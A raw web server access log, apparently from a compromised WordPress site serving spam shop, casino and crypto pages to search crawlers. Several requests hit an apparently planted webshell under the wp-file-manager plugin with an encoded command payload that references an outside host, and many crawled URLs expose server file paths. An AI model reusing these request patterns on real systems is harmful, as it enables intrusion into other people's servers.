66.249.73.162 - - [28/Apr/2026:07:34:58 +0300] "GET /shop/quakiness/conicoid751922968875.html HTTP/1.1" 200 30038 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [28/Apr/2026:07:35:11 +0300] "GET /shop/nickelanddimed/dermatitis16697022179.html HTTP/1.1" 200 29572 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:33:18 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343339382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303739382q3138326137323735633330633663316334343062303236643865346638646266222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
85.208.96.195 - - [28/Apr/2026:07:35:18 +0300] "GET /index.php?shop%2Fmasticophis%2Fmeeth051991723912.html HTTP/1.1" 200 10388 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.204 - - [28/Apr/2026:07:35:20 +0300] "GET /index.php?shop%2Fresetter%2Fionophore051651213081.html HTTP/1.1" 200 10377 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:35:20 +0300] "GET /shop/withdrawingroom/chuckled11162394387.html HTTP/1.1" 200 28638 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [28/Apr/2026:07:35:26 +0300] "GET /shop/chaunt/fastidious681375066560.html HTTP/1.1" 200 30601 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.168.12 - - [28/Apr/2026:07:35:30 +0300] "GET /detail/108580365?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-comments-post.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/2" 200 6093 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.81 - - [28/Apr/2026:07:35:34 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc%2FFile.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc HTTP/2" 200 8932 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.1 - - [28/Apr/2026:07:35:35 +0300] "GET /discover-tronscan-your-key-to-comprehensive-crypto-tracking/ HTTP/1.1" 200 10383 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.78.1 - - [28/Apr/2026:07:35:37 +0300] "GET /shop/taxidermic/detracting42878235529.html HTTP/1.1" 200 29926 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:33:40 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343432302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303832302q3430326532323332376264376335313563386134616635393934303262386165222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [28/Apr/2026:07:35:45 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc%2FPHP52 HTTP/2" 200 3227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [28/Apr/2026:07:34:02 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343434322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303834322q3663393630623731333164393833383763643739633438333637366331316137222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [28/Apr/2026:07:36:03 +0300] "GET /shop/whallabee/unpleasantry082200933778.html HTTP/1.1" 200 29769 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.78.1 - - [28/Apr/2026:07:36:09 +0300] "GET /shop/tarre/disembowered50756649286.html HTTP/1.1" 200 28739 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
40.77.167.23 - - [28/Apr/2026:07:36:11 +0300] "GET /sitemap-sub-2420.xml HTTP/2" 200 38222 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
85.208.96.204 - - [28/Apr/2026:07:36:12 +0300] "GET /?page_id=5268 HTTP/1.1" 200 10327 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:36:12 +0300] "GET /shop/clancular/plenariness80446066892.html HTTP/1.1" 200 28780 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:36:16 +0300] "GET /shop/bonibell/destroyer53973802990.html HTTP/1.1" 200 30018 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:36:18 +0300] "GET /shop/rigidity/stans882166226539.html HTTP/1.1" 200 29317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:34:24 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343436342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303836342q3531643336656137363239636635656265343236326338346464626638623633222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
85.208.96.201 - - [28/Apr/2026:07:36:26 +0300] "GET /index.php?shop%2Fjugular%2Fflowerbasket053984208179.html HTTP/1.1" 200 10386 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.162 - - [28/Apr/2026:07:36:30 +0300] "GET /shop/prongbuck/agalloch024044475136.html HTTP/1.1" 200 28299 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
17.22.253.85 - - [28/Apr/2026:07:36:32 +0300] "GET /discover-the-ultimate-power-of-dexscreener-for-traders/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/miniorange-malware-protection/readme.txt&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/miniorange-malware-protection HTTP/1.1" 200 9303 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.237.229 - - [28/Apr/2026:07:36:33 +0300] "GET /benefits-of-using-solscan-for-crypto-investors/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/miniorange-malware-protection/views HTTP/1.1" 200 5509 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [28/Apr/2026:07:36:33 +0300] "GET /shop/unfumed/instrumentalness573962689129.html HTTP/1.1" 200 28927 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
17.22.253.162 - - [28/Apr/2026:07:36:35 +0300] "GET /explore-the-comprehensive-features-of-atomic-wallet/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/languages/wp-file-manager-af.po&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-file-manager/languages HTTP/1.1" 200 12426 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
216.73.217.81 - - [28/Apr/2026:07:36:36 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc%2FCompat.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fsodium_compat%2Fsrc HTTP/2" 200 21006 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.1 - - [28/Apr/2026:07:36:40 +0300] "GET /shop/dishonorer/interlaminar012572953805.html HTTP/1.1" 200 29380 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
185.216.113.70 - - [28/Apr/2026:07:34:46 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373335343438362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335303838362q3031333130333862643730663466623036346433323537363236363436343734222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.78.1 - - [28/Apr/2026:07:36:47 +0300] "GET /?detail/173279115 HTTP/1.1" 200 28214 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.1 - - [28/Apr/2026:07:36:48 +0300] "GET /shop/noxious/savour123709571728.html HTTP/1.1" 200 28440 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode%2Feditor-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode HTTP/2" 200 3106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Fstyle-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2929 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Fstyle-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2936 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fhtml%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fhtml HTTP/2" 200 3119 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fjs%2Futils.js&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fjs HTTP/2" 200 67793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fhtml%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fhtml HTTP/2" 200 3110 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode HTTP/2" 200 3116 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Feditor-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Feditor-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:56 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fjs%2FintlTelInput.js&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fjs HTTP/2" 200 24905 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2934 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode HTTP/2" 200 3112 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Fblock.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 3347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Ftheme-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Ftheme-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:57 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode HTTP/2" 200 3115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Feditor.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2886 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fshortcode HTTP/2" 200 3104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Feditor.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.78.2 - - [28/Apr/2026:07:36:57 +0300] "GET /shop/pontifex/citigrade012964173503.html HTTP/1.1" 200 29056 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.116 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Ftheme.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2923 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Ftheme.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2FRequests%2Fsrc%2FException%2FTransport.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2FRequests%2Fsrc%2FException HTTP/2" 200 2965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fcss%2Fjoinchat.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcreame-whatsapp-me%2Fadmin%2Fcss HTTP/2" 200 4516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [28/Apr/2026:07:36:58 +0300] "GET /kasyno-na-komorke-na-pieniadze/url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2FRequests%2Fsrc%2FException%2FHttp.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2FRequests%2Fsrc%2FException HTTP/2" 200 3465 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
